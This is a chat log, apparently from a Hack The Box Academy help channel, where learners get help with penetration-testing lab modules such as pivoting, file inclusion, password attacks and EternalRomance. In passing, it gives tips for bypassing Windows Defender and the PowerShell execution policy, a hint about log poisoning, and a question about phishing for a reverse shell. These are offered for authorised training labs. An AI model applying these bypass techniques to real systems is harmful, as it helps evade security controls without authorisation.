hey i am a complete beginner how do i start and from where

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Hello I try to use zap replacer in module using web proxy but It doesn't work, I don't understand what is the reason?

anyone ?

Hi, I am also stuck not being able to access www.inlanefreight.com. ping 8.8.8.8 works fine, but can't curl www.google.com. Are you referring to or own VPN or the pwnbox vpn? disconneting my own VPN doesn't change anything, and I couldn't find any VPN settings on the pwnbox. A bit lost with my newbie skills here, any pointers where to look?

You should be able to access www.inlanefreight.com without a VPN as it is a public domain. Here' I'm talking about HTB's vpn and that it shouldn't be used alongside the pwnbox because they use the same network and ip and thus can cause connection problems.

If you can't connect to any website at all I'd check your network settings, although I do believe that the pwnbox has a limited internet connection

I can access www.inlanefreight.com from my own browser, but not from within HTB.

what do you mean not from within HTB ?

pardon my wording, its still confusing at times: I open the what I assume is a VM from within the accedemy, with Desktop, terminal, and firefox browser. From that firefox browser, internet is not accessible, at least inlanefreight.com

Are you referring to the pwnbox perhaps? Yeah I mentioned that that has limited internet connection

yes, the pwnbox you have access to for 120 minutes. not using their internet at all, just now for sovling the exercise. I mean that amount of internet connecting should be granted, no?

It's not that it doesn't have access to the internet, it can only access very specific sites for security reasons

makes total sense. Now I cant access curl https://www.inlanefreight.com which should be accessible, and I wonder if I missed any settings.

try terminating the instance and swapping pwnbox locations

I'm assuming this is for the Linux Fundamentals module?

Yes correct

Does terminating the instance kick me out until tomorrow cos I can only spawn up one instance a day?

If you still have time no (as far as I can remember)

Nope.
Free users are allowed 1 Pwnbox spawn per day. Get unlimited Pwnbox access by either subscribing for any plan or buying any amount of cubes in Academy's billing page, https://academy.hackthebox.com/billing
Shit happens. Looks like I have to try tmrw. I report back if changing the pwnbox location helped. Thanks a lot 🙏

You can always just use your own VM and connect to academy through that

@foggy aspen can you do a full refresh Ctrl + f5 and try to spawn it again?

uh, greenfield again, is that an reasonable thing to do for beginners? otherwise it might be exceeding my current skills...
And hey, ctrl + F5 worked, what other magic cheat codes do you know? 🙂

this is just a one off- a staff member noticed you were having issues and reset your limit

thank you guys, very very helpful 🙏

-# also just for clarification, Discord moderators are NOT staff, we're volunteers

doesn't help.

And I appreciate your help. I wonder if I should reach out to support directly to not spam the discord with my issue. Please say so if you think it makes more sense

how can i start?

Yeah that's rather strange as I've just tested it and it worked fine on my end, go ahead and contact support through the bubble on the bottom right (you might have to disable your ad blocker)

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

@vagrant walrus

As the new update for CBBH -> CWSE will remove some modules for example hacking wordpress, will they remain achievable, are they just removed from the path or enitrely from HTB

hi,
has anyone else had issues with the SocksOverRDP part of "Pivoting, Tunneling and Port Forwarding" ?
windows defender on the target appears to be detecting + removing the SocksOverRDP-Plugin.dll as soon as i unzip it
im not sure if im doing something wrong, if the env is bugged, or if i am meant to know how to get past windows defender by this point

just noticed the hint so guess its option 3 🙁 , im so bad at this :p

You can add an exception for the DLL file in Defender, but it's still a very janky way of doing things. If you want a more sensible approach, try using ligolo-ng for this instead

i think i managed it once i realised that getting around defender was part of it

Is there any chance can help me? Because in my Current Path Junior Cybersecurity Analyst
the module in Components of a Network the the question
"What type of cable is used to connect components within a local area network for high-speed data transfer?"
My answers are:
Ethernet cable
LAN cable
RJ-45 cable
RJ-45 connector
Ethernet cable with RJ-45 connector

Still wrong answer.

Also here
"What type of network cable is used to transmit data over long distances with minimal signal loss?"
My answers are:
Fiber optic cable
Optical fiber

And Still wrong

Anyone could give advice regarding this?
Thank you!

Its a hyphenated word

Also drop the word cable

Its in the reading as well as a hyphenated word

Disable real-time protection

@novel valve dont spoil modules above tier 0

oh sry

where can i then ask ?

okay so I remove the hyphenated word when answering? Thanks!

You don't remove the hyphenated word, you remove the word "cable"

Hi

How can I become a hacker?

You can ask here, just dont include spoilers that show things like successful payloads and stuff

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

@opaque cliff ^

Can anyone help me ? i'm stuck in the "Limited File Upload" Module and i dont get the right result with xxe.

Why are you trying to view the image directly?

There are so many articles I don't understand

hm, i'm confused

Take it one step at a time

View the source of the base webpage

I got the answer! Thanks a lot!
you're right I just need to remove the cable word

Write me privately

no

i dont understand it, yeah its just .svg allowed and that is it but i cant see anything in source code when i uploaded it

after clicking upload (if you just uploaded a test.svg, that's not an image) view the page source

Thx 🙂

got it

@tight gulch that's illegal, please familiarize yourself with the #rules

Ok

So how should i use it

how to can I connect to the DC1 ? on this section https://academy.hackthebox.com/module/176/section/1778 I used chisel but not getting a connection back.

You can likely connect to dc1 from your rdp connection

cant use ps remote

on the machine

Or rdp

But you may be able to do Set-ExecutionPolicy -scope process bypass before running Chisel

Thanks

if you haven't figured this out already, it wants you to use the input from the given example above. this entire section definitely needs to be rewritten with clearer explanations and question

Not able to spawn an instance while doing the AD module because i'm getting a prompt saying there are no instances available

I frankly still cannot figure out what its asking for. I finished the entire module with no problems except for that question

Change vpn regions, you'll need to download a new vpn

the latency is extremely high for every available region

like 100000ms

i'm trying to spawn a pwnbox instance

Sounds like a network issue

this has never happened before , any solutions?

Restart your router

i was actually using WARP so it might have increased the latency i just switched it off and now it's working thanks!

As the new update for CBBH -> CWSE will remove some modules for example hacking wordpress, will they remain achievable, are they just removed from the path or enitrely from HTB

A PowerShell question here, pertaining to File Transfers. Are the asynchronous download options provided in the content because it would be an ideal practice to use an asynchronous download operation on something like a webserver so that there would be no interference with regular operations? I know it is a non-blocking operation for the thread, but what thread exactly are they talking about? Would the OS not schedule my cmdlet either way?

to my understanding, they will simply be removed from the path. they won't be removed from the platform

i would ask support for a concrete answer however

okay

They arent removed from the platform. When some modules were announced they had notes that they would be replacing modules in the cbbh path

i enter it correctly its saying wrong

Space at the end ?

no space

Refresh page and try again

Also please dont share screenshots that may reveal answers :)

sorry mb

still getting the same error even after refreshing 😭

are you sure that is the correct flag? some of the environments contain multiple flags but only 1 of them is correct for the question

i am pretty sure this is the only flag

@limber fog im 99% certain the CDATA method isnt possible in that section

tried everything still wrong

worked

Is anyone available to help me with Windows Lateral Movement. Windows Remote Management: Q3?

I was able to authenticate as Helen on DC previously.

is there any new updated info on "Nibbles" as everything is 4 years old and not really helpful imo.

Review the ways you can execute commands.

It hasn't been updated

So old stuff should still be relevant

I had make a dumb mistake, it worked

okay, thank you but its not helpful to me. ill keep looking.

Are you referring to the sections in the "getting started" module or the retired machine itself

I was talking abt that section

the getting started stuff, theres no similarities to the stuff i find on yt guiding it.

Interesting, I dont recall getting the CDATA method working

Hey guys, i just kinda finished starting point machines.

You should be able to follow it and it worked just fine

So I'm kinda very new

like i upload the .php and get the errors, can log in and all but once they start throwing random stuff out and skipping steps is what confuses me

Please help me out, how do I get better? I am struggling with easy web machines 🥲

eh easy to just say that

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Did you take notes while going through starting point?

Yes

Also this isnt #general, if you read and follow #welcome instructions youll be able to access more of the server

There's some basic web modules in htb academy which might be useful to cover some basics for foothold

I am Computer Science graduate, currently an Application security intern

So I have a good hold on fundamentals... But I get slapped when it comes to understanding code and figuring out exploits

This channel is for assistance with academy modules, not for anything outside of that

General chats aren't open, where can I discuss about this?

#welcome explains how to gain access to more of the server, as I stated

Cybersecurity roadmap for beginners?

this support is garbage, ill just figure it out myself. hes a glorified bot spouting one word replies. yikes

Thanks

Im not staff, im just a community volunteer. It helps others help you if you explain or give the errors youre receiving

A common problem ive seen in the getting started module is people not replacing the placeholder ip in the example php command

Hey guys

I'm new here

Hey, this isn't #general . If you want access to more of the server, #welcome has instructions

CS graduate? What languages did you learn in your program and what do you mean get slapped when it comes to understanding code and figuring out exploits?

I couldn't figure out how to create my own payloads.

So far I've only done DSA based coding, and got some hands-on development experience (practice projects)

No one here is your help monkey, they are humans. Read, google, and jesus christ calm down.

They already left

I think what I'm lacking is ... Being able to read documentations and figuring out stuff with just "google"

I was thinking ill be good to go with that

i dont take it personally tbh ¯_(ツ)_/¯

👍🏻

Similar to all other coding, when you find a machine is vulnerable to a particular exploit, read the code, try to understand it and replicate it.

Im sure you have seen it all

A common search pattern for me:
"How to do x in linux"
"man (toolname)"
"Am I good enough to have imposter syndrome"

🤣🎉

Alright, thanks for that.

She is right, you have to get very specific with your questions. The more specific the better answer you can get

Also let's try and keep this channel on topic 😉

But yh, being able to understand online documents and CVE's is my next step.

ChatGpt said it, he's cool at times.

sometimes you cant get an answer at all even from google unless you know what to ask

Sometimes getting too specific hinders your search

Keywords are what really matter

Documentation for sure is the literal most important thing when writing software

How long would it take me to be able to pwn new machines and rank up? Atleast upto medium difficulty.

Just asking so that I don't over expect from myself. Haha.

On this platform? Hard to say. I don't know what you're doing or how long you are doing it for.

The skill curve has exponentially changed from 4 years ago to now (4 years being the starting point machine)

but she is right, this is off topic

Easy now is around hard from 4 years ago due to skill floor difference

I don't care if it takes me an year tbh, I've all the time - I'm still young hahaha

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

https://www.hackthebox.com/blog/It-is-Okay-to-Use-Writeups

Medium boxes can definitely be done in a year of dilligent daily effort

expecially since you have a foundation in CS. That is what really helped me get a leg up in this.

You will however be lacking in networking fundamentals unless that was in your curriculum for some reason

and OS stuff too

Yh, I didn't feel lost in starting point machines at all (except that I had to understand windows internals 😑).

Got humbled when I started new machines

Yep, they both were in my curriculum

acadamy has two modules that would be great for you, windows fundamentals and linux fundaments (if you don't already know a decent amount about linux)

Those two will be your bread and butter, so surface level knowledge really won't cut it

I've been playing around with Linux for 2 years now. I got a hang of it. Recently installed kali as my local OS.

Previously I used Arch

I use arch btw lol, but no seriously youre on a good start. dont get discouraged, hacking is its own game too. Treat it like you were having to learn conditional statements and for loops again. It will compound

Yh man, thanx alot.
Thanks to you too @fathom pendant

I need to install pyftpdlib for the File Transfer module. The install instruction recommend pip3, I know best practice is typically pipx but since this is a library and not a command line utility, should I just use pip3? I can't think of any way that it would negatively impact my environment beyound accupying disk space

I don't know if its just me but this password attacks skill assessment is literally killing me. I did like 75% of this module before it was updated (left it midway and moved onto others) completed everything upto attacking common applications including AD but man this is too hard for me. Is there anything that I should learn before trying to do this skill assessment. I'm totally lost.

anyone got a updated writeup for the password attacks module

It's above tier 0, so making a writeup would be against the terms of service.

oh ok

Hello Everyone

Walking through CPTS path - let's do this together with and as a team -

One of us in Windows Privilege Escalation - if you here as well, never hesitate to DM

hello all, I'm Facing an issue in File Inclusion -> Server Log poisoning, i manipulate the User-Agent header and see the output contianing the CMD or any other string i give, however again when i try to /var/log/apache2/access.og&cmd=id or any other command it gives me the blank page

what am i doing wrong

Anyone available to lend a hand with Introduction to Deserialization Attacks Skill Assessment 2?
I managed to get the first question and I'm able to obtain the admin cookie, but I'm stuck on the second question in regards to the PHP Gadget. I'm pretty sure I have the right version but the server is not executing my code.

Have you looked closely at the log? ||There are characters that you must not use, because otherwise you will destroy the log file.||

nope, you mean i read the content of the log

maybe the log file is kept destroying

Hey I need help in solving HTB lab..I got stuck... I have access of mail account of client X . Now I want to do phishing attack on client Y . Client Y only click the link sent by client X. How to get reverse shell of client Y ?? Can anyone help me ?? Expert please

Take a close look at the log file and think about what happens when you insert characters somewhere.

Well, without knowing which module and section you are working in, it is impossible to give you any tips.

You can send me a DM.

Hi, did you find a solution for this? I'm running into the same problem...

I got the flag, bascially the issue was if i send mutiple requests in repeater (3-4 times) it crashes it or deletes the log file, so carefully trying it gave me the flga.

although i was using single quote.

although can you please refer the characters you were talking about.

try pipx; if pipx doesn't work pip3 (you'll need to add --break-system-packages)

aw0ken has given you the character

or reading the log carefully, imo it was far easier for me to review in view-source mode rather than the formatted page view

ah yeah

Hello ! I am in password attacks - pass the ticket module and when I try to solve it using my local Kali vm I get a lot and I mean a lot dependencies issues with the tools etc. also when I somehow managed to fix them I get error from the target domain that the time is not the same as mine but I don’t know a way to find out the domains time

once to set the poison twice to activate

faketime is one method

I don’t know the domains time though so that I make mine the same as its time

there's a command somewhere in this chat that has the syntax i'm sure if you search this chat for 'faketime' you'll find it

ntpdate

ntpdate*

not update

all i did was search 'faketime' and it was a few messages down

i just forwarded the first relevant one ¯_(ツ)_/¯

lol i've never needed it so i don't have the syntax offhand

What's does blood means?

Like pertaining to boxes and cyber security

Are those the only things you can get from hacking into a box?

Yeah

i've never had to do it i've gotten lucky (I'm in the US, and i've never had a clock skew error, just lucky ig)

So where it says command where what am I supposed to write ?

in order to gain access to chat in #general, you're gonna need to link your account following the instructions in #welcome.

the command you're trying to run

And it is going to run ias If I had the same date as the target ?

yes

Also in this module I get too many dependencies errors that htb does not mention . Is that normal ? I use latest version of Kali

make sure your kali is fully updated

sudo apt update && sudo apt upgrade

then restart the vm

It is updated indeed

The most problems are with python packages

The easiest way to run such python things is in a virtual environment.

https://docs.python.org/3/library/venv.html

Yes, a little bit under my first message someone answered me, using UV basically fixed the issue

Hey i'm working on the attacking DNS section in Attacking common services, the question tells you to use subbrute and I used the exact commands that it said in the module but the program is running into a list index out of range error. The section only put "ns1.inlanefreight.htb" in the resolvers.txt file and I did the same so I'm not sure why the result is different. I also made sure to add inlanefreight.htb to my /etc/hosts file just in case that was needed. Does anyone know how to get this command to work? ./subbrute.py inlanefreight.htb -s ./names.txt -r ./resolvers.txt

thank you! found the messages and got it to work. I previously downgraded only to 16.7.19 which also didn't work. It worked with frida 16.1.11 and the matching frida-tools (which really was easy with uv as shown in your response)

use the ip instead

you'd need to add ns1.inlanefreight.htb to your hosts file as well btw

if you're not using the ip*

how do i read the contents of flag.txt in metasploit module “use the metasploit franework to exploit the target with eternalromance. find the flag.txt file on administrators desktop and submit the contents ss the answer”

I’m in the shell right now

keyword Administrator

:)

(administrator is a user on Windows machines much like root on linux)

I am assuming i have to look through the cheatsheet

I did this but I'm getting the same error. My resolvers.txt is just ns1.inlanefreight.htb and the command I used was ./subbrute.py 10.129.14.91 -s ./names.txt -r ./resolvers.txt

replace ns1.inlanefreight.htb with the spawned ip

(also the ip for the ns1.inlanefreight.htb ns would be the ip of the target, if it's even configured)

well unfortunately im already in a shell

do i have to restart the process

go to C:/Users/Administrator

you should be NT Authority/System yeah?

if you do whoami

yes

then you can access anywhere on the system

\

if you're unsure of navigation within a windows environment, there's a windows fundamentals module and intro to windows CLI module

oh i did it

heeeeeeeeeey im in admin now

the question tells you exactly where to look forit

Used the same command but made the resolvers.txt the ip but im still not getting anything

have patience atp

just let it run for a few minutes and you may receive some information

gotchu thanks